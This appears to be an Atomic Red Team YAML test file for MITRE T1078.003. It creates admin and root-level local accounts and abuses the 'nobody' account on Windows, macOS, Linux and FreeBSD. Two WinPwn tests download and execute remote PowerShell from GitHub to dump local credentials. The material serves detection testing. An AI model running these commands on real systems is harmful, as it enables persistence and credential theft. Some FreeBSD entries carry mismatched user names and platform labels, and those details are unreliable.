Hare Sudhan
226 lines
9.0 KiB
YAML
226 lines
9.0 KiB
YAML
attack_technique: T1078.003
|
|
display_name: 'Valid Accounts: Local Accounts'
|
|
atomic_tests:
|
|
- name: Create local account with admin privileges
|
|
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
|
|
description: After execution the new account will be active and added to the Administrators group
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
password:
|
|
description: Password for art-test user
|
|
type: string
|
|
default: -4RTisCool!-321
|
|
executor:
|
|
command: |-
|
|
net user art-test /add
|
|
net user art-test #{password}
|
|
net localgroup administrators art-test /add
|
|
cleanup_command: |-
|
|
net localgroup administrators art-test /delete >nul 2>&1
|
|
net user art-test /delete >nul 2>&1
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Create local account with admin privileges - MacOS
|
|
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
|
|
description: After execution the new account will be active and added to the Administrators group
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
command: |-
|
|
dscl . -create /Users/AtomicUser
|
|
dscl . -create /Users/AtomicUser UserShell /bin/bash
|
|
dscl . -create /Users/AtomicUser RealName "Atomic User"
|
|
dscl . -create /Users/AtomicUser UniqueID 503
|
|
dscl . -create /Users/AtomicUser PrimaryGroupID 503
|
|
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
|
|
dscl . -passwd /Users/AtomicUser mySecretPassword
|
|
dscl . -append /Groups/admin GroupMembership AtomicUser
|
|
cleanup_command: |-
|
|
sudo dscl . -delete /Users/AtomicUser
|
|
name: bash
|
|
elevation_required: true
|
|
- name: Create local account with admin privileges using sysadminctl utility - MacOS
|
|
auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
|
|
description: After execution the new account will be active and added to the Administrators group
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
command: |-
|
|
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
|
|
cleanup_command: |-
|
|
sysadminctl interactive -deleteUser art-tester
|
|
name: bash
|
|
elevation_required: true
|
|
- name: Enable root account using dsenableroot utility - MacOS
|
|
auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
|
|
description: After execution the current/new user will have root access
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
command: |-
|
|
dsenableroot #current user
|
|
dsenableroot -u art-tester -p art-tester -r art-root #new user
|
|
cleanup_command: |-
|
|
dsenableroot -d #current user
|
|
dsenableroot -d -u art-tester -p art-tester #new user
|
|
name: bash
|
|
elevation_required: true
|
|
- name: Add a new/existing user to the admin group using dseditgroup utility - macOS
|
|
auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
|
|
description: After execution the current/new user will be added to the Admin group
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
command: |-
|
|
dseditgroup -o edit -a art-user -t user admin
|
|
cleanup_command: |-
|
|
dseditgroup -o edit -d art-user -t user admin
|
|
name: bash
|
|
elevation_required: true
|
|
- name: WinPwn - Loot local Credentials - powerhell kittie
|
|
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
|
|
description: Loot local Credentials - powerhell kittie technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
obfuskittiedump -consoleoutput -noninteractive
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: WinPwn - Loot local Credentials - Safetykatz
|
|
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
|
|
description: Loot local Credentials - Safetykatz technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
safedump -consoleoutput -noninteractive
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Create local account (Linux)
|
|
auto_generated_guid: 02a91c34-8a5b-4bed-87af-501103eb5357
|
|
description: |
|
|
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: bash
|
|
elevation_required: true
|
|
command: |
|
|
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
|
|
su art
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
userdel -r art
|
|
- name: Create local account (FreeBSD)
|
|
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
|
description: |
|
|
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
pw useradd art -g wheel -s /bin/sh
|
|
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
|
su art
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
rmuser -y art
|
|
- name: Reactivate a locked/expired account (Linux)
|
|
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
|
description: |
|
|
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
|
|
|
|
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: bash
|
|
elevation_required: true
|
|
command: |
|
|
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
|
|
usermod --lock art
|
|
usermod --expiredate "1" art
|
|
usermod --unlock art
|
|
usermod --expiredate "99999" art
|
|
su art
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
userdel -r art
|
|
- name: Reactivate a locked/expired account (FreeBSD)
|
|
auto_generated_guid: 09e3380a-fae5-4255-8b19-9950be0252cf
|
|
description: |
|
|
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
|
|
|
|
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
pw useradd art -g wheel -s /bin/sh
|
|
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
|
pw lock art
|
|
pw usermod art -e +1d
|
|
pw unlock art
|
|
pw user mod art -e +99d
|
|
su art
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
rmuser -y art
|
|
- name: Login as nobody (Linux)
|
|
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
|
description: |
|
|
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: bash
|
|
elevation_required: true
|
|
command: |
|
|
cat /etc/passwd |grep nobody
|
|
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
|
chsh --shell /bin/bash nobody
|
|
usermod --password $(openssl passwd -1 nobody) nobody
|
|
su nobody
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
chsh --shell /usr/sbin/nologin nobody
|
|
cat /etc/passwd |grep nobody
|
|
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
|
- name: Login as nobody (freebsd)
|
|
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
|
description: |
|
|
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
cat /etc/passwd |grep nobody
|
|
# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
|
pw usermod nobody -s /bin/sh
|
|
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
|
|
su nobody
|
|
whoami
|
|
exit
|
|
cleanup_command: |
|
|
pw usermod nobody -s /usr/sbin/nologin
|
|
cat /etc/passwd |grep nobody
|
|
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
|
|